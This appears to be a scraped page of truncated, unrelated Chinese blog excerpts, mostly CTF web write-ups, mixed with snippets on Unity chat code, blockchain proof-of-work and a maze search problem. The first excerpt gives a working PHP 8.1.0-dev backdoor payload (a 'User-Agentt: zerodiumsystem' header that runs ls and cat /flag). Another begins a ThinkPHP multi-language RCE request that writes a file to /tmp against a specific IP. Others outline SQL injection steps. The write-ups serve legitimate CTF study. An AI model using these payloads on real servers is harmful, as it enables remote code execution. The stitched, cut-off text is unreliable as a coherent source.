首先进入靶场如下 按照习惯，BP先抓一波包结合题目说的 题目利用了PHP某一开发版本的重大后门，可以利用某写东西进行代码执行。于是想到伪协议操作一下发送给reapter发现伪协议  嗯  不得行不过响应包有个东西引起注意百度发现好家伙 这里有东西 这家伙 有漏洞可以用在Connection字段下面加上User-Agentt:zerodiumsystem("ls/");注意zerodium后面拼接函数发送好家伙!有东西然后替换成这个User-Agentt:zerodiumsystem("cat/flag"); 提交 就完事儿了

目录前置知识导图：​TCP/IP体系结构（IP和端口）：IP是什么：是计算机在互联网上的唯一标识（坐标，代号），用于在互联网中寻找计算机。内网（局域网）IP和公网（互联网）IP：内网IP：路由以内的网络，可以连接互联网，但是互联网无法直接连接内网（需要端口映射）如何判断自己的电脑是内网还是公网：公网IP：互联网IP地址。端口是什么：是应用程序（服务）在计算机中的唯一标识。HTTP协议--网站访问的基础：BS架构：浏览器Browser---发送请求--->服务器Server---响应--->浏览器BrowserHTTP协议是什么：超文本传输协议特点：请求消息： ​HTTP常见有八种请求方式，常用

前言CTF（CaptureTheFlag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。是目前青少年，最喜欢参加的竞赛之一。如何入门？首先，我们必须要了解什么CTF的比赛规则，一般的CTF比赛分为以下两个阶段：1.线上选拔比赛：主要考察的题目范围包括：1.Web安全，2.Reverse（逆向工程）3.Crypto（密码学）4.PWN（二进制）5.Misc（一些混合杂项的电脑知识）2.线下总决赛主要考察：1.AWD（AttackWithDefense

目录web签到题web2考查点：1.判断sql注入回显位置2.查当前数据库名称3.查看数据库表的数量4.查表的名字5.查flag表列的数量6.查flag表列的名字7.查flag表记录的数量8.查flag表记录值web3web4web5 web6web签到题whereisflag？直接F12去找一下  找到  Y3Rmc2hvd3s1YzYyZWE0Mi04M2E5LTRhNDUtODRiMi00NzJkZGViZTcxNGF9通过base64解密，拿到flagweb2查看了hint，直接使用hint中的payload考查点：基本的SQL注入多表联合查询在用户名处注入sql语句，密码随意1.判断

web1Thinkphplang多语言RCE漏洞，直接打GET/index.php?+config-create+/+/tmp/keep.phpHTTP/1.1Host:47.98.124.175:8080Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/108.0.0.0Safari/537.36Accept:text/html,application/xhtml+x

一、搭建Unity聊天室UI界面简单UI拖拽一下： 聊天室实现步骤：1.向服务器发送消息2.刷新Content聊天界面3.清空输入框将InputField中输入的消息发给服务器 代码：chatPanel:usingSystem;usingSystem.Collections;usingSystem.Collections.Generic;usingSystem.Text;usingTMPro;usingUnityEngine;usingUnityEngine.UI;publicclassChatPanel:MonoBehaviour{StringBuilderstringBuilder=new

1、文件包含概念程序开发人员会把重复使用的函数、变量、类等数据写到单个文件中，需要使用到里面的数据时直接调用此文件，而无需再次编写，这种文件调用的过程称为文件包含。2、文件包含相关函数require()//找不到被包含文件时产生错误，停止脚本运行include()//找不到被包含文件时产生警告，脚本继续运行include_once()//与include类似，唯一区别就是文件已经被包含则不再包含require_once()//与require类似，唯一区别就是文件已经被包含则不再包含3、文件包含漏洞介绍程序开发人员希望代码更灵活，所以将被包含文件设置成变量，来进行动态调用，但正是由于这种灵活性

week还有一些遗留问题一起来看一下工作量证明Proofofwork区块链其实就是一个基于互联网去中心化的账本，每个区块相当于一页账本，它记录了交易内容。因为比特币是一个去中心账本，会引发记账一致性问题。一致性问题就是所有的区块，记账内容可能不一样。在比特币系统中，每一个节点都要保存一份完整交易信息。但是应为每个节点的环境不同，会接受到不一样的信息，如果同时记账，会导致账本不一致。因此我们需要找出一个代表帮我们记账，然后内容分享给其他节点，比特币中通过竞争记账的方法解决记账系统的一致性问题。在比特币系统中，大约每10分钟进行一轮算力竞赛，竞赛的胜利者，就获得一次记账的权力，并向其他节点同步新增

1.迷宫题目描述给定一个N*M方格的迷宫，迷宫里有T处障碍，障碍处不可通过。在迷宫中移动有上下左右四种方式，每次只能移动一个方格。数据保证起点上没有障碍。给定起点坐标和终点坐标，每个方格最多经过一次，问有多少种从起点坐标到终点坐标的方案。输入格式第一行为三个正整数N,M,T，分别表示迷宫的长宽和障碍总数。第二行为四个正整数SX,SY,FX,FY，SX,SY代表起点坐标，FX,FY代表终点坐标。接下来T行，每行两个正整数，表示障碍点的坐标。输出格式输出从起点坐标到终点坐标的方案总数。样例#1样例输入#1221112212样例输出#11提示对于100%的数据，1显然这是一道搜索题(这不是废话吗),

CTF-攻防世界web新手入门（全）攻防世界网址1、view_source2、robots3、backup4、cookie5、disabled_button6、weak_auth7、simple_php8、get_post9、xff_referer10、webshell11、command_execution12、simple_js攻防世界网址https://adworld.xctf.org.cn新手篇虽然非常简单，但是对于小白来说这种最常见的常识或者思路可能不熟悉，所以在这里给大家分享一下最不起眼的小常识或者小技巧。1、view_source访问题目场景，如下图鼠标右击不能用，但是F12也可